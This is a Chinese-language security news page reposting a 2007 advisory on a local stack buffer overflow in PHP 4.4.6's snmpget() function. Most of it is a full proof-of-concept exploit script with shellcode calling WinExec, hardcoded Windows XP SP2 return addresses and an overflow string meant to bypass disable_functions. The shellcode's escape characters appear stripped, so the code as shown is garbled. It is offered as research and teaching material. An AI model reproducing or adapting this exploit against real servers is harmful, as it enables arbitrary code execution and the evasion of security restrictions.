| |
 您现在的位置: 猫头鹰病毒资讯网 >> 系统安全 >> 系统安全 >> 文章正文 |
| PHP SNMPGet函数本地栈溢出漏洞 |
| 作者:佚名 文章来源:网络收集 点击数: 更新时间:2007-9-28 |
PHP SNMPGet
描述:
PHP SNMPGet函数本地栈溢出漏洞
详细:
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP4的snmpget()函数中存在栈溢出漏洞,攻击者可能利用此漏洞在服务器上执行任意指令。
如果本地攻击者发送了超长参数的话,就可能触发这个溢出,导致执行任意代码,绕过disable_functions之类的安全限制。
<*来源:rgod (rgod@autistici.org)
链接:(http://secunia.com/advisories/24440/
*>
受影响系统:
PHP PHP 4.4.6
攻击方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
// PHP 4.4.6 snmpget() object id local buffer overflow poc exploit
// by rgod
// site: http://retrogod.altervista.org
// win xp sp2 version
// to be launched form the cli
if (!extension_loaded("snmp")){
die("you need the snmp extension loaded.");
}
$____scode=
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbx6dx13x86x7c". //WinExec
"xffxd3".
"x31xc0".
"x50".
"xbbxdaxcdx81x7c". //ExitProcess
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"start notepad & ";
$edx="x64x8fx9bx01"; //jmp scode
$eip="x73xdcx82x7c"; //0x7C82DC73jmp edx
$____suntzu=str_repeat("A",188).$edx.str_repeat("A",64).$eip.str_repeat("x90",48).$____scode.str_repeat("x90",48);
//more than 256 chars result in simple eip overwrite
snmpget(1,1,$____suntzu);
?>
解决方案:
厂商补丁:
PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
|
|
|
|
|
|
|
|
|
|
